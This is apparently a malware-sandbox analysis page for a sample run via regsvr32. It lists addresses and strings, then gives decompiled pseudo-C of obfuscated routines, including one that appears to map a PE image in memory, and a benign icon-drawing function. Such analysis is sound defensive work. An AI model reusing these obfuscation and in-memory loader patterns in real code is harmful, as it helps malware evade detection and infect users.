0x04b928d0
0x04b928dc
0x04b928df
0x04b928e3
0x04b928eb
0x04b928f3
0x04b928fd
0x04b92901
0x04b92909
0x04b92911
0x04b9291e
0x04b92922
0x04b9292a
0x04b92937
0x04b9293b
0x04b92943
0x04b92948
0x04b92950
0x04b92958
0x04b92960
0x04b92968
0x04b92970
0x04b92978
0x04b92985
0x04b92989
0x04b92991
0x04b92999
0x04b929a1
0x04b929a9
0x04b929b1
0x04b929be
0x04b929c2
0x04b929cc
0x04b929d9
0x04b929e3
0x04b929f0
0x04b929f8
0x04b92a00
0x04b92a08
0x04b92a10
0x04b92a18
0x04b92a20
0x04b92a28
0x04b92a33
0x04b92a36
0x04b92a3a
0x04b92a42
0x04b92a4a
0x04b92a52
0x04b92a5a
0x04b92a62
0x04b92a6c
0x04b92a70
0x04b92a78
0x04b92a80
0x04b92a88
0x04b92a8d
0x04b92a95
0x04b92a9d
0x04b92aa2
0x04b92aaa
0x04b92ab2
0x04b92aba
0x04b92ac2
0x04b92aca
0x04b92acf
0x04b92ad4
0x04b92adc
0x04b92ae4
0x04b92ae9
0x04b92aee
0x04b92af6
0x04b92afe
0x04b92b06
0x04b92b0e
0x04b92b16
0x04b92b1e
0x04b92b26
0x04b92b2b
0x04b92b33
0x04b92b41
0x04b92c06
0x04b92b70
0x04b92b70
0x00000000
0x04b92b70
0x04b92b4d
0x04b92c70
0x04b92c7d
0x04b92c7f
0x00000000
0x04b92c8e
0x04b92b55
0x04b92b84
0x04b92b8d
0x04b92b91
0x04b92b99
0x04b92b9e
0x04b92bc3
0x04b92bd6
0x04b92bf0
0x04b92bf5
0x04b92bf8
0x00000000
0x04b92bf8
0x04b92b5d
0x04b92b74
0x04b92b7b
0x04b92b7f
0x00000000
0x04b92b7f
0x04b92b61
0x04b92c52
0x04b92c52
0x04b92c58
0x00000000
0x00000000
0x00000000
0x04b92c58
0x04b92b6b
0x00000000
0x04b92b6b
0x04b92c24
0x04b92c45
0x04b92c4a
0x04b92c4d
0x00000000

Strings

"G[, xrefs: 04B92950
fG, xrefs: 04B92A20
Yt, xrefs: 04B92A95
7h, xrefs: 04B9285E
ME, xrefs: 04B927FF
WYz, xrefs: 04B92AAA
A\gl, xrefs: 04B92948
x;K, xrefs: 04B92B1E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
API String ID: 0-2581693823
Opcode ID: e2b55b93af860cda8bc9d4d452cd7b78fc88557d9f475be9c8b79ffb177a1fc9
Instruction ID: 59051e92d80bb059d81c097362bfa674a1e5581bcaf7fd616e8369480f0b31a0
Opcode Fuzzy Hash: e2b55b93af860cda8bc9d4d452cd7b78fc88557d9f475be9c8b79ffb177a1fc9
Instruction Fuzzy Hash: AFC11DB18093419FD768CF25C58A51BBBF1FBC4758F108A6DF29696260D3B19A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04BA3263, Relevance: 10.2, Strings: 8, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04BA3263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t171;
				void* _t188;
				void* _t198;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t233;
				void* _t238;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;

				_push(_a16);
				_t240 = _a4;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B9FE29(_t171);
				_v52 = 0x577e5f;
				_v52 = _v52 >> 2;
				_v52 = _v52 >> 2;
				_t202 = 0x5a;
				_v52 = _v52 / _t202;
				_v52 = _v52 ^ 0x00001f8d;
				_v56 = 0xc1a783;
				_v56 = _v56 | 0xd091f394;
				_t203 = 0x7d;
				_v56 = _v56 / _t203;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00004aea;
				_v36 = 0x5ab329;
				_v36 = _v36 | 0xfb978afd;
				_v36 = _v36 << 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x77fa0040;
				_v60 = 0xfb6851;
				_t204 = 0x5f;
				_v60 = _v60 / _t204;
				_v60 = _v60 + 0xffff827f;
				_v60 = _v60 + 0xffffffdf;
				_v60 = _v60 ^ 0x000cafd7;
				_v24 = 0xe59b9d;
				_v24 = _v24 + 0x8cf1;
				_v24 = _v24 << 0xd;
				_v24 = _v24 ^ 0xc51da5fe;
				_v40 = 0x4a3359;
				_v40 = _v40 + 0xb1f1;
				_v40 = _v40 ^ 0xc176e2ad;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe0393f27;
				_v44 = 0x442ad8;
				_v44 = _v44 + 0xffffa8db;
				_v44 = _v44 ^ 0xa2d0149a;
				_v44 = _v44 | 0x2bbd0b31;
				_v44 = _v44 ^ 0xabb0f764;
				_v20 = 0x80424;
				_v20 = _v20 + 0xffff6539;
				_v20 = _v20 + 0xd5f9;
				_v20 = _v20 ^ 0x000cf2ae;
				_v48 = 0x677157;
				_v48 = _v48 + 0xec21;
				_v48 = _v48 ^ 0x036b165d;
				_t205 = 0x14;
				_v48 = _v48 / _t205;
				_v48 = _v48 ^ 0x002fc559;
				_v16 = 0xa7ae7b;
				_v16 = _v16 | 0x7198ce36;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0xe373c07b;
				_v32 = 0xbd3d32;
				_v32 = _v32 | 0x84fa4a87;
				_v32 = _v32 * 0xf;
				_t206 = 0x34;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0xd7bdec0b;
				_v8 = 0x4158ae;
				_v8 = _v8 / _t206;
				_v8 = _v8 ^ 0x000847ec;
				_v28 = 0x8e7645;
				_v28 = _v28 + 0xffff0216;
				_v28 = _v28 + 0x7276;
				_t207 = 0x60;
				_v28 = _v28 * 0x4a;
				_v28 = _v28 ^ 0x290f0829;
				_v4 = 0x80a154;
				_v4 = _v4 ^ 0x762c831e;
				_v4 = _v4 ^ 0x76a70d93;
				_v12 = 0x206e81;
				_v12 = _v12 / _t207;
				_v12 = _v12 + 0xffffa107;
				_v12 = _v12 ^ 0xffff9c06;
				_t208 = _v60;
				_t188 = E04BA287F(_v60, _a4, _v24);
				_t198 = _t188;
				_t242 =  &(( &_v60)[7]);
				if(_t198 != 0) {
					_t233 = E04B962C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
					_t243 =  &(_t242[6]);
					if(_t233 == 0) {
						L6:
						return _t233;
					}
					E04B9C9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
					_t244 =  &(_t243[4]);
					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
					while(_t238 < _t200) {
						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
						E04B9C9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
						_t244 =  &(_t244[4]);
						_t238 = _t238 + 0x28;
					}
					goto L6;
				}
				return _t188;
			}

0x04ba3268
0x04ba326c
0x04ba3270
0x04ba3272
0x04ba3276
0x04ba3277
0x04ba3278
0x04ba3279
0x04ba327e
0x04ba3288
0x04ba328d
0x04ba3298
0x04ba329d
0x04ba32a3
0x04ba32ab
0x04ba32b3
0x04ba32bf
0x04ba32c4
0x04ba32ca
0x04ba32cf
0x04ba32d7
0x04ba32df
0x04ba32e7
0x04ba32ec
0x04ba32f1
0x04ba32f9
0x04ba3305
0x04ba330a
0x04ba3310
0x04ba3318
0x04ba331d
0x04ba3325
0x04ba332d
0x04ba3335
0x04ba333a
0x04ba3342
0x04ba334a
0x04ba3352
0x04ba335a
0x04ba335f
0x04ba3367
0x04ba336f
0x04ba3377
0x04ba337f
0x04ba3387
0x04ba338f
0x04ba3397
0x04ba339f
0x04ba33a7
0x04ba33af
0x04ba33b7
0x04ba33bf
0x04ba33cb
0x04ba33ce
0x04ba33d2
0x04ba33da
0x04ba33e2
0x04ba33ea
0x04ba33ee
0x04ba33f6
0x04ba33fe
0x04ba340b
0x04ba3418
0x04ba341b
0x04ba341f
0x04ba3427
0x04ba3437
0x04ba343b
0x04ba3443
0x04ba344b
0x04ba3453
0x04ba3460
0x04ba3461
0x04ba3465
0x04ba346d
0x04ba3475
0x04ba347d
0x04ba3485
0x04ba3495
0x04ba3499
0x04ba34a1
0x04ba34ad
0x04ba34b1
0x04ba34b6
0x04ba34b8
0x04ba34bd
0x04ba34ea
0x04ba34ec
0x04ba34f1
0x04ba3557
0x00000000
0x04ba3559
0x04ba3508
0x04ba3511
0x04ba351b
0x04ba3520
0x04ba3552
0x04ba353a
0x04ba3547
0x04ba354c
0x04ba354f
0x04ba354f
0x00000000
0x04ba3556
0x04ba355f

Strings

Wqg, xrefs: 04BA33AF
$P, xrefs: 04BA34CB
vr, xrefs: 04BA3453
'?9, xrefs: 04BA335F
@, xrefs: 04BA32F1
J, xrefs: 04BA32CF
_~W, xrefs: 04BA327E
!, xrefs: 04BA33B7

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !$$P$'?9$@$Wqg$_~W$vr$J
API String ID: 0-3966742547
Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction ID: d55d8a58af0d6e1cc38dde2c0980f8b3de2f55f0fc5b2a76d63dca0e4ca0b4e5
Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction Fuzzy Hash: BF814072508340AFD358CF66C88981BBBF2FBC5758F109A1CF99986260D3B6E955CF06

Uniqueness

Uniqueness Score: -1.00%

Function 04BA17BD, Relevance: 9.1, Strings: 7, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04BA17BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E04B9FE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
				_v1644 = _v1644 ^ 0x280f1fa3;
				_v1644 = _v1644 | 0x80dcb776;
				_v1644 = _v1644 ^ 0xa8d7b48e;
				_v1612 = 0x310401;
				_v1612 = _v1612 << 0xc;
				_v1612 = _v1612 ^ 0x10456323;
				_v1708 = 0xec7d3e;
				_v1708 = _v1708 + 0xffff4756;
				_t465 = 0x19;
				_v1708 = _v1708 / _t465;
				_v1708 = _v1708 * 0x78;
				_v1708 = _v1708 ^ 0x04625198;
				_v1676 = 0xc1499c;
				_v1676 = _v1676 + 0x787f;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 >> 0xd;
				_v1676 = _v1676 ^ 0x0006bbad;
				_v1620 = 0xc8864f;
				_v1620 = _v1620 + 0xdb64;
				_t466 = 0x71;
				_v1620 = _v1620 / _t466;
				_v1620 = _v1620 ^ 0x00054ec4;
				_v1716 = 0x58bfc6;
				_v1716 = _v1716 << 0xc;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 >> 0xa;
				_v1716 = _v1716 ^ 0x00309503;
				_v1584 = 0x2a66b4;
				_t467 = 0x6c;
				_v1584 = _v1584 * 0x62;
				_v1584 = _v1584 ^ 0x103c6d70;
				_v1628 = 0xcd0e9a;
				_v1628 = _v1628 + 0xffff6b98;
				_v1628 = _v1628 + 0xffffdc7c;
				_v1628 = _v1628 ^ 0x00cd4883;
				_v1684 = 0x7bfe73;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 * 0x31;
				_v1684 = _v1684 ^ 0x5ee8daf9;
				_v1660 = 0x1f1c01;
				_v1660 = _v1660 >> 4;
				_v1660 = _v1660 / _t467;
				_v1660 = _v1660 ^ 0x000ccbd2;
				_v1720 = 0x840fb2;
				_v1720 = _v1720 | 0xa69eff81;
				_v1720 = _v1720 << 0xe;
				_v1720 = _v1720 + 0xffff3037;
				_v1720 = _v1720 ^ 0xbfecb97e;
				_v1656 = 0xd8a297;
				_v1656 = _v1656 + 0x41c1;
				_v1656 = _v1656 ^ 0x1d9d441b;
				_v1656 = _v1656 ^ 0x1d437da6;
				_v1580 = 0xe77586;
				_v1580 = _v1580 + 0xfffff7e8;
				_v1580 = _v1580 ^ 0x00e53b2f;
				_v1728 = 0x20c0e;
				_v1728 = _v1728 + 0x594f;
				_t468 = 0x79;
				_v1728 = _v1728 / _t468;
				_v1728 = _v1728 ^ 0x017ec3a2;
				_v1728 = _v1728 ^ 0x01734834;
				_v1712 = 0x467deb;
				_v1712 = _v1712 | 0xfb06902d;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 0xb;
				_v1712 = _v1712 ^ 0xef0dc14e;
				_v1632 = 0xa85c1c;
				_v1632 = _v1632 << 3;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x54293107;
				_v1596 = 0x697bfe;
				_v1596 = _v1596 | 0x748d72c7;
				_v1596 = _v1596 ^ 0x74e3de32;
				_v1640 = 0x724245;
				_t222 =  &_v1640; // 0x724245
				_v1640 =  *_t222 * 0x4c;
				_t224 =  &_v1640; // 0x724245
				_v1640 =  *_t224 * 0x26;
				_v1640 = _v1640 ^ 0x08f66fe6;
				_v1648 = 0xa241b2;
				_v1648 = _v1648 >> 4;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x890355d2;
				_v1604 = 0x4e61c6;
				_v1604 = _v1604 | 0x297abf50;
				_v1604 = _v1604 ^ 0x29742082;
				_v1608 = 0xdfdd08;
				_v1608 = _v1608 | 0x096e656f;
				_v1608 = _v1608 ^ 0x09fe8e74;
				_v1624 = 0x7e1789;
				_v1624 = _v1624 + 0xd6ac;
				_v1624 = _v1624 + 0xffff1ac7;
				_v1624 = _v1624 ^ 0x007fce14;
				_v1688 = 0xd4150c;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 ^ 0x561d7592;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x001f305a;
				_v1696 = 0x3e923d;
				_v1696 = _v1696 ^ 0x624df4c6;
				_t469 = 0x29;
				_v1696 = _v1696 / _t469;
				_v1696 = _v1696 + 0xffffe680;
				_v1696 = _v1696 ^ 0x026755ff;
				_v1704 = 0xed73af;
				_t470 = 0x36;
				_v1704 = _v1704 / _t470;
				_v1704 = _v1704 * 0x76;
				_v1704 = _v1704 >> 3;
				_v1704 = _v1704 ^ 0x0041c6e0;
				_v1664 = 0xe0489c;
				_v1664 = _v1664 * 0x4e;
				_v1664 = _v1664 * 0x21;
				_v1664 = _v1664 << 0xf;
				_v1664 = _v1664 ^ 0x084e6c7b;
				_v1672 = 0xcef4bd;
				_v1672 = _v1672 * 0x4b;
				_v1672 = _v1672 + 0xffff3dcb;
				_v1672 = _v1672 << 0x10;
				_v1672 = _v1672 ^ 0xf1249f73;
				_v1680 = 0x187dc5;
				_v1680 = _v1680 | 0x94fddf65;
				_v1680 = _v1680 << 1;
				_v1680 = _v1680 ^ 0x244f0190;
				_v1680 = _v1680 ^ 0x0db75cb9;
				_v1616 = 0xe6e563;
				_v1616 = _v1616 ^ 0xa5d4beb7;
				_v1616 = _v1616 + 0xffffcebd;
				_v1616 = _v1616 ^ 0xa53dba5b;
				do {
					while(_t425 != 0x6a96cc9) {
						if(_t425 == 0xabcd6f9) {
							_push(_t425);
							__eflags = E04B985FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
							_t462 =  !=  ? 1 : _t462;
						} else {
							if(_t425 == 0xbbc45e7) {
								E04B81A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
								_t475 =  &(_t475[8]);
								_t425 = 0xe9b1f6b;
								continue;
							} else {
								_t482 = _t425 - 0xe9b1f6b;
								if(_t425 != 0xe9b1f6b) {
									goto L8;
								} else {
									_push(_v1644);
									_push(_v1724);
									_push(_v1652);
									_t412 = E04B9E1F8(0x4b81030, _v1692, _t482);
									E04B87078( &_v1560, _t482);
									_t415 =  *0x4ba6214; // 0x0
									_t419 =  *0x4ba6214; // 0x0
									E04B8F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
									E04B9FECB(_t412, _v1584, _v1628, _v1684, _v1660);
									_t475 =  &(_t475[0x10]);
									_t425 = 0xabcd6f9;
									continue;
								}
							}
						}
						L11:
						return _t462;
					}
					_push(_v1728);
					_t346 =  &_v1580; // 0xe53b2f
					_push( *_t346);
					_push(_v1656);
					_t397 = E04B9E1F8(0x4b810f0, _v1720, __eflags);
					E04B87078( &_v1560, __eflags);
					_t400 =  *0x4ba6214; // 0x0
					_t402 =  *0x4ba6214; // 0x0
					__eflags = _t402 + 0x23c;
					E04B8BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
					E04B9FECB(_t397, _v1624, _v1688, _v1696, _v1704);
					_t475 =  &(_t475[0x13]);
					_t425 = 0xabcd6f9;
					L8:
					__eflags = _t425 - 0xcc0d361;
				} while (__eflags != 0);
				goto L11;
			}

0x04ba17c7
0x04ba17ce
0x04ba17d0
0x04ba17d7
0x04ba17d8
0x04ba17d9
0x04ba17de
0x04ba17e9
0x04ba17ec
0x04ba17f9
0x04ba1804
0x04ba1809
0x04ba1810
0x04ba1818
0x04ba1820
0x04ba1828
0x04ba1830
0x04ba1844
0x04ba1849
0x04ba1852
0x04ba185d
0x04ba1868
0x04ba1873
0x04ba187e
0x04ba1886
0x04ba188b
0x04ba1893
0x04ba189b
0x04ba18a3
0x04ba18ab
0x04ba18b0
0x04ba18b8
0x04ba18bd
0x04ba18c5
0x04ba18d0
0x04ba18d8
0x04ba18e3
0x04ba18eb
0x04ba18f3
0x04ba18f8
0x04ba1900
0x04ba1908
0x04ba1910
0x04ba191d
0x04ba1920
0x04ba1924
0x04ba192c
0x04ba1934
0x04ba193c
0x04ba194c
0x04ba1950
0x04ba1958
0x04ba1960
0x04ba1968
0x04ba1970
0x04ba1978
0x04ba1983
0x04ba198b
0x04ba1996
0x04ba199e
0x04ba19aa
0x04ba19ad
0x04ba19b6
0x04ba19ba
0x04ba19c4
0x04ba19cc
0x04ba19d4
0x04ba19d9
0x04ba19de
0x04ba19e6
0x04ba19ee
0x04ba19fc
0x04ba1a01
0x04ba1a0a
0x04ba1a15
0x04ba1a1d
0x04ba1a22
0x04ba1a27
0x04ba1a2c
0x04ba1a34
0x04ba1a47
0x04ba1a4a
0x04ba1a51
0x04ba1a5c
0x04ba1a64
0x04ba1a6c
0x04ba1a74
0x04ba1a7c
0x04ba1a84
0x04ba1a89
0x04ba1a93
0x04ba1a97
0x04ba1a9f
0x04ba1aa7
0x04ba1ab4
0x04ba1ab8
0x04ba1ac0
0x04ba1ac8
0x04ba1ad0
0x04ba1ad5
0x04ba1add
0x04ba1ae5
0x04ba1aed
0x04ba1af5
0x04ba1afd
0x04ba1b05
0x04ba1b10
0x04ba1b1b
0x04ba1b26
0x04ba1b2e
0x04ba1b3a
0x04ba1b3d
0x04ba1b41
0x04ba1b49
0x04ba1b51
0x04ba1b59
0x04ba1b61
0x04ba1b66
0x04ba1b6b
0x04ba1b73
0x04ba1b7b
0x04ba1b80
0x04ba1b85
0x04ba1b8d
0x04ba1b98
0x04ba1ba3
0x04ba1bae
0x04ba1bb6
0x04ba1bbb
0x04ba1bbf
0x04ba1bc4
0x04ba1bca
0x04ba1bd7
0x04ba1be4
0x04ba1be9
0x04ba1bee
0x04ba1bf6
0x04ba1c01
0x04ba1c0c
0x04ba1c17
0x04ba1c22
0x04ba1c2d
0x04ba1c38
0x04ba1c40
0x04ba1c48
0x04ba1c50
0x04ba1c58
0x04ba1c60
0x04ba1c65
0x04ba1c6d
0x04ba1c72
0x04ba1c7a
0x04ba1c82
0x04ba1c90
0x04ba1c95
0x04ba1c9b
0x04ba1ca3
0x04ba1cab
0x04ba1cb7
0x04ba1cba
0x04ba1cc3
0x04ba1cc7
0x04ba1ccc
0x04ba1cd4
0x04ba1ce1
0x04ba1cea
0x04ba1cee
0x04ba1cf3
0x04ba1cfb
0x04ba1d08
0x04ba1d0c
0x04ba1d14
0x04ba1d19
0x04ba1d21
0x04ba1d29
0x04ba1d31
0x04ba1d35
0x04ba1d3d
0x04ba1d45
0x04ba1d50
0x04ba1d5b
0x04ba1d66
0x04ba1d71
0x04ba1d71
0x04ba1d7f
0x04ba1f31
0x04ba1f5b
0x04ba1f5d
0x04ba1d85
0x04ba1d8b
0x04ba1e67
0x04ba1e6c
0x04ba1e6f
0x00000000
0x04ba1d91
0x04ba1d91
0x04ba1d93
0x00000000
0x04ba1d99
0x04ba1d99
0x04ba1da2
0x04ba1da6
0x04ba1dae
0x04ba1dbc
0x04ba1ddd
0x04ba1e03
0x04ba1e0d
0x04ba1e2d
0x04ba1e32
0x04ba1e35
0x00000000
0x04ba1e35
0x04ba1d93
0x04ba1d8b
0x04ba1f60
0x04ba1f6c
0x04ba1f6c
0x04ba1e76
0x04ba1e7f
0x04ba1e7f
0x04ba1e86
0x04ba1e8e
0x04ba1e9f
0x04ba1ebb
0x04ba1ec8
0x04ba1ecd
0x04ba1eff
0x04ba1f19
0x04ba1f1e
0x04ba1f21
0x04ba1f23
0x04ba1f23
0x04ba1f23
0x00000000

Strings

OY, xrefs: 04BA1B2E
c, xrefs: 04BA1D45
oen, xrefs: 04BA1C22
>}, xrefs: 04BA1996
}F, xrefs: 04BA1B51
/;, xrefs: 04BA1E7F
EBr, xrefs: 04BA1BB6

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /;$>}$EBr$OY$c$oen$}F
API String ID: 0-419207597
Opcode ID: ad7c3c52712ce3938e945a53b450da62c93fbd52e6f87da1160dd207aff08a28
Instruction ID: f334fa129d5fa3517581930dc5a87d3a908c4afbf0374fb20db9f88bab616d4f
Opcode Fuzzy Hash: ad7c3c52712ce3938e945a53b450da62c93fbd52e6f87da1160dd207aff08a28
Instruction Fuzzy Hash: 3B0201B15083809FD764CF65C889A9FBBE1FBC4358F108A1DE2DA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10008B90, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10008B90(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				void* _t41;
				void* _t66;
				struct tagRECT* _t82;
				void* _t84;
				void* _t85;
				signed int _t86;

				_t37 =  *0x10057a08; // 0xe86d94f5
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E10013247(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x188));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

0x10008b99
0x10008ba0
0x10008ba3
0x10008bb3
0x10008bb9
0x10008bbb
0x10008c94
0x10008bc1
0x10008bc7
0x10008bcb
0x10008bd3
0x10008bd5
0x10008be6
0x10008bd7
0x10008bd7
0x10008bd7
0x10008c01
0x10008c0f
0x10008c1a
0x10008c1d
0x10008c2b
0x10008c3d
0x10008c42
0x10008c51
0x10008c56
0x10008c65
0x10008c72
0x10008c7e
0x10008c87
0x10008c87
0x10008ca6

APIs

IsIconic.USER32 ref: 10008BB3

Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A

SendMessageA.USER32(?,00000027,?,00000000), ref: 10008C01
GetSystemMetrics.USER32 ref: 10008C09
GetSystemMetrics.USER32 ref: 10008C14
GetClientRect.USER32 ref: 10008C2B
DrawIcon.USER32 ref: 10008C7E

